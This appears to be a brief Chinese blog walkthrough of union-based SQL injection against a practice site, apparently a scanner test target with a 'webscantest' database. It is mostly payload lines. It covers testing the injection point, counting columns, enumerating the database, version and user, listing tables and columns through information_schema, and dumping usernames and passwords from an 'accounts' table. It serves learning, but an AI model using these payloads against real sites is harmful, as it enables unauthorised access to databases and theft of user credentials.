sql 注入实操

and 1=1
and 1=2测试注入点

sql注入练习
发现注入点 sql注入
order by n 测试列数

sql注入练习
测试结果为4

爆库 版本 用户
union selec 1,2,database(),4
union selec 1,2,version(),4
union selec 1,2,user(),4
sql注入练习
sql注入练习
sql注入练习
**表
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = ‘webscantest’ ),3,4
sql注入练习
爆字段
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘webscantest’ and table_name=‘accounts’ ),3 ,4
sql注入练习
查询内容
union select 1,group_concat(uname,0x3a,passwd),3,4 from webscantest.accounts

相关文章:

  • 2021-09-22
  • 2021-05-07
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-05-14
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-07-10
  • 2021-09-23
  • 2021-08-07
  • 2021-07-10
  • 2021-07-31
相关资源
相似解决方案